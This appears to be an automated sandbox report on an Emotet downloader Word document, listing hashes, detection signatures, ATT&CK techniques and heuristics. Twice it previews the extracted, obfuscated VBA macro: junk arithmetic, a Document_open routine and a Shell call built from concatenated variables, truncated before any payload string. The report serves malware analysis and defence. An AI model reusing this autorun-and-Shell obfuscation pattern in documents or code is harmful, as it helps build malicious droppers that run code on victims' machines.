Emotet Office (OLE) malware analysis — malicious · b4abe520f3daffba

MALICIOUS

Office (OLE)

360.2 KB Created: 2018-07-19 18:04:00 Authoring application: Microsoft Office Word First seen: 2018-09-04

MD5: 9c61d510e88b4cf8874af78cf7c48d46 SHA-1: 0c2c98554d13c0e4fb84e4623cb07cb9acf8e647 SHA-256: b4abe520f3daffba8d806780ec85dc2b1e4e26874632ab2daa4f44ee83f27fda

182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6878773-0. Static analysis detected critical heuristics for VBA macros and the use of the Shell() function, indicating the document is designed to execute arbitrary code. The presence of a Document_Open macro further suggests an automated execution upon opening. These factors strongly point to a downloader or droppper functionality, characteristic of the Emotet family.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6878773-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6878773-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45147 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45147 bytes
SHA-256: `5554df0d3e63dfa79980fc94857f44a90d9e1975fec21cde35f9ca05d0d8777a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WAFpXPOCFcW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function jjqNJQXbLLSUT() On Error Resume Next bcZpK = (qBijop - MAQMGw / 92206 * 11477 - (66352 - zEhOaj * YrOiY - iJZhp + NXwYC - uXnWAv)) bEzPk = (UHEIn - cbilK / 63351 * 7233 - (77625 - AidDj * cMEds - NiTwo + dMFvpO - TNFEb)) fIHbT = (Vjkdu - MjYKqX / 54694 * 37807 - (59009 - iSQaV * BBpFB - fIwka + NwGkOj - vnAcz)) jckdiQ = (hKwbB - whDjOG / 88545 * 39858 - (47864 - fiPfI * CrSOf - GYvDZ + jMAzBL - pkpmpW)) End Function Private Function CMtkcaiTlRfiw() On Error Resume Next JWoXzk = (DSmjF - vShkpt / 14249 * 61777 - (55283 - jouszM * WHmYwF - SalAvX + CjsRTm - vRfzhl)) BkcvA = (pqSAbU - osQXFj / 17322 * 33415 - (17021 - wEmUY * qpQBR - CKswb + wwfMUJ - rGKQF)) RZRNp = (LwjrLh - OKfEMC / 77797 * 62059 - (11376 - hlthi * pZKFW - WmnowF + oPjop - OjXiVp)) zLbnHA = (qokntz - wDuJaN / 30507 * 23994 - (61349 - RSdhF * hUHTZD - cbqXV + zpjjo - NlUYlL)) CrFrVQ = (SWzMu - PIGkF / 81950 * 63129 - (9855 - afZHa * HYRUij - tvEBi + QVUHsW - JYPbuX)) End Function Private Function vbWWLBtruAiu() On Error Resume Next tNOsFq = (wIivz - pdsXF / 64349 * 29785 - (55011 - TTRCwA * YAwYG - jBMKB + sOvLO - wqtzE)) LLifSY = (jDSuwP - ELYpR / 60598 * 31500 - (74502 - tiIYT * hjEBa - XhRIw + sWfcmE - QYEirh)) zkzJz = (RWmqup - jiHhU / 95377 * 45125 - (30424 - RwEYCt * BNUwcZ - TwwFbA + mrOnkt - zWkGIQ)) WmYYww = (JkmOTI - janXV / 30832 * 74654 - (18286 - NMRQbl * CKBNPU - jLzaU + cawXiT - VkdUI)) zLoWs = (cGEsOz - FXIdV / 49420 * 44579 - (33936 - zadnk * KvKTC - QuPFP + HpXdHL - nTmWJV)) UNuub = (tGYjh - YFSwqL / 90922 * 60625 - (29496 - RXHCiz * iZwKK - JlHkHH + UiOOpS - tCnIIz)) End Function Private Sub Document_open() On Error Resume Next zqurA = (cKKqzQ - GrswKp / 86044 * 78005 - (88296 - rEmSzk * dKMtQ - HPaQH + smzVqw - aFGYrO)) zuIih = (wOOnl - MiUDu / 12412 * 72379 - (65435 - wwRoqO * mDcuX - wOLBHb + jICdwl - EoTEQN)) fXHQzj = (FFYdlW - DtYoQT / 11783 * 36276 - (70377 - fjAJJL * ViMjDO - DBRBEt + oVmvP - utPiM)) IaoWWA = (XCAKD - pdPUp / 3086 * 66629 - (25930 - DhFYRI * wbjRz - aWwAl + HKSuZ - RzJkjK)) lQjnw = (jHDKwA - tlOCEO / 82099 * 41946 - (83706 - NNtzz * ShTQuu - SdFLNJ + KovlTJ - Nawwwt)) Shell "" + mOJiZmN + spWlikY + CVar("c") + BBsjvTAKSXlUf + EdLHcYFZM + cJBPWsdXBhX + XXizIlA + SscqLlUVJ + tjoLOtazWrf + wiSMFw + vaiXiziVmCw + woSuFiHVm + RmSYlbzB + tNVZUcBN + IhdIha + oSJwvuswSWa + OJdEJuM + OrMEmlpvIWs + VJOPinzj + NBXUh + VYcwKOtEf + JYwsO + icbRN + Cuifkcijkww + wDdMHAZRHf, 0 BJNdzv = (CjuUN - wMWti / 40193 * 63533 - (17445 - CflhC * CQUPqj - fknAY + jOpnFP - upkfv)) FHVUvA = (wDDQid - iJLBUK / 66348 * 79388 - (54194 - SmmEwI * OujfVJ - owRAU + mwjHSP - GLdOQ)) hGirS = (UzTZEW - ihlFi / 92385 * 88941 - (49124 - NsjRt * NjoUsS - YBvhfS + vPiiwb - DfzzD)) End Sub Private Function QvTRwHIFUKjo() On Error Resume Next PwrLnT = (FuMcY - WuwOLs / 74215 * 9713 - (1198 - zwQat * jXNOIQ - cLjaF + wKrcDk - YNnFi)) lKoXtT = (oilniP - tzXIW / 5428 * 52809 - (43534 - JMkAw * nSWbs - jSbjsn + ljFsL - VJQts)) OBiKI = (qnqSQ - WiJiv / 48892 * 56870 - (29065 - kZEUZw * rWZirY - ioRaZ + OvQolp - LfUUP)) XorKE = (BvFGZz - hnEVl / 66335 * 59705 - (32238 - iCnKTN * aVmPp - tHwcM + pQVtba - OGnCP)) jJnJoI = (vBNPC - nEdCPS / 72264 * 61228 - (73332 - GtpRzI * NKIWLj - fUUXUu + BtXUA - HTWczz)) fuNXt = (ROpPJ - GYVCiR / 63805 * 17669 - (3247 - GVMpU * SkIjh - qiwJj + ikVcSY - ACKJnz)) End Function Private Function VRSqHIzNzGiM() On Error Resume Next fqjlf = (rBYDn - JPlHVj / 16264 * 37724 - (50261 - SlczqK * OsBiC - KViUKm + Arvmc - bvmtlv)) iMZGu = (izzwqH - aRmcZq / 30234 * 42241 - (87990 - HpIIl * covmbN - VCazAj + LGfTt - HPciE)) mSQmiw = (WKvVP - UQZwt / 28537 * 79045 - (56950 - AKoPP * NLNhrd - CloPE + tBLJDj ... (truncated)

SHA-256: 5554df0d3e63dfa79980fc94857f44a90d9e1975fec21cde35f9ca05d0d8777a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WAFpXPOCFcW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function jjqNJQXbLLSUT()
On Error Resume Next
   bcZpK = (qBijop - MAQMGw / 92206 * 11477 - (66352 - zEhOaj * YrOiY - iJZhp + NXwYC - uXnWAv))
   bEzPk = (UHEIn - cbilK / 63351 * 7233 - (77625 - AidDj * cMEds - NiTwo + dMFvpO - TNFEb))
   fIHbT = (Vjkdu - MjYKqX / 54694 * 37807 - (59009 - iSQaV * BBpFB - fIwka + NwGkOj - vnAcz))
   jckdiQ = (hKwbB - whDjOG / 88545 * 39858 - (47864 - fiPfI * CrSOf - GYvDZ + jMAzBL - pkpmpW))
End Function
Private Function CMtkcaiTlRfiw()
On Error Resume Next
   JWoXzk = (DSmjF - vShkpt / 14249 * 61777 - (55283 - jouszM * WHmYwF - SalAvX + CjsRTm - vRfzhl))
   BkcvA = (pqSAbU - osQXFj / 17322 * 33415 - (17021 - wEmUY * qpQBR - CKswb + wwfMUJ - rGKQF))
   RZRNp = (LwjrLh - OKfEMC / 77797 * 62059 - (11376 - hlthi * pZKFW - WmnowF + oPjop - OjXiVp))
   zLbnHA = (qokntz - wDuJaN / 30507 * 23994 - (61349 - RSdhF * hUHTZD - cbqXV + zpjjo - NlUYlL))
   CrFrVQ = (SWzMu - PIGkF / 81950 * 63129 - (9855 - afZHa * HYRUij - tvEBi + QVUHsW - JYPbuX))
End Function
Private Function vbWWLBtruAiu()
On Error Resume Next
   tNOsFq = (wIivz - pdsXF / 64349 * 29785 - (55011 - TTRCwA * YAwYG - jBMKB + sOvLO - wqtzE))
   LLifSY = (jDSuwP - ELYpR / 60598 * 31500 - (74502 - tiIYT * hjEBa - XhRIw + sWfcmE - QYEirh))
   zkzJz = (RWmqup - jiHhU / 95377 * 45125 - (30424 - RwEYCt * BNUwcZ - TwwFbA + mrOnkt - zWkGIQ))
   WmYYww = (JkmOTI - janXV / 30832 * 74654 - (18286 - NMRQbl * CKBNPU - jLzaU + cawXiT - VkdUI))
   zLoWs = (cGEsOz - FXIdV / 49420 * 44579 - (33936 - zadnk * KvKTC - QuPFP + HpXdHL - nTmWJV))
   UNuub = (tGYjh - YFSwqL / 90922 * 60625 - (29496 - RXHCiz * iZwKK - JlHkHH + UiOOpS - tCnIIz))
End Function
Private Sub Document_open()
On Error Resume Next
   zqurA = (cKKqzQ - GrswKp / 86044 * 78005 - (88296 - rEmSzk * dKMtQ - HPaQH + smzVqw - aFGYrO))
   zuIih = (wOOnl - MiUDu / 12412 * 72379 - (65435 - wwRoqO * mDcuX - wOLBHb + jICdwl - EoTEQN))
   fXHQzj = (FFYdlW - DtYoQT / 11783 * 36276 - (70377 - fjAJJL * ViMjDO - DBRBEt + oVmvP - utPiM))
   IaoWWA = (XCAKD - pdPUp / 3086 * 66629 - (25930 - DhFYRI * wbjRz - aWwAl + HKSuZ - RzJkjK))
   lQjnw = (jHDKwA - tlOCEO / 82099 * 41946 - (83706 - NNtzz * ShTQuu - SdFLNJ + KovlTJ - Nawwwt))
Shell "" + mOJiZmN + spWlikY + CVar("c") + BBsjvTAKSXlUf + EdLHcYFZM + cJBPWsdXBhX + XXizIlA + SscqLlUVJ + tjoLOtazWrf + wiSMFw + vaiXiziVmCw + woSuFiHVm + RmSYlbzB + tNVZUcBN + IhdIha + oSJwvuswSWa + OJdEJuM + OrMEmlpvIWs + VJOPinzj + NBXUh + VYcwKOtEf + JYwsO + icbRN + Cuifkcijkww + wDdMHAZRHf, 0
   BJNdzv = (CjuUN - wMWti / 40193 * 63533 - (17445 - CflhC * CQUPqj - fknAY + jOpnFP - upkfv))
   FHVUvA = (wDDQid - iJLBUK / 66348 * 79388 - (54194 - SmmEwI * OujfVJ - owRAU + mwjHSP - GLdOQ))
   hGirS = (UzTZEW - ihlFi / 92385 * 88941 - (49124 - NsjRt * NjoUsS - YBvhfS + vPiiwb - DfzzD))
End Sub
Private Function QvTRwHIFUKjo()
On Error Resume Next
   PwrLnT = (FuMcY - WuwOLs / 74215 * 9713 - (1198 - zwQat * jXNOIQ - cLjaF + wKrcDk - YNnFi))
   lKoXtT = (oilniP - tzXIW / 5428 * 52809 - (43534 - JMkAw * nSWbs - jSbjsn + ljFsL - VJQts))
   OBiKI = (qnqSQ - WiJiv / 48892 * 56870 - (29065 - kZEUZw * rWZirY - ioRaZ + OvQolp - LfUUP))
   XorKE = (BvFGZz - hnEVl / 66335 * 59705 - (32238 - iCnKTN * aVmPp - tHwcM + pQVtba - OGnCP))
   jJnJoI = (vBNPC - nEdCPS / 72264 * 61228 - (73332 - GtpRzI * NKIWLj - fUUXUu + BtXUA - HTWczz))
   fuNXt = (ROpPJ - GYVCiR / 63805 * 17669 - (3247 - GVMpU * SkIjh - qiwJj + ikVcSY - ACKJnz))
End Function
Private Function VRSqHIzNzGiM()
On Error Resume Next
   fqjlf = (rBYDn - JPlHVj / 16264 * 37724 - (50261 - SlczqK * OsBiC - KViUKm + Arvmc - bvmtlv))
   iMZGu = (izzwqH - aRmcZq / 30234 * 42241 - (87990 - HpIIl * covmbN - VCazAj + LGfTt - HPciE))
   mSQmiw = (WKvVP - UQZwt / 28537 * 79045 - (56950 - AKoPP * NLNhrd - CloPE + tBLJDj
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.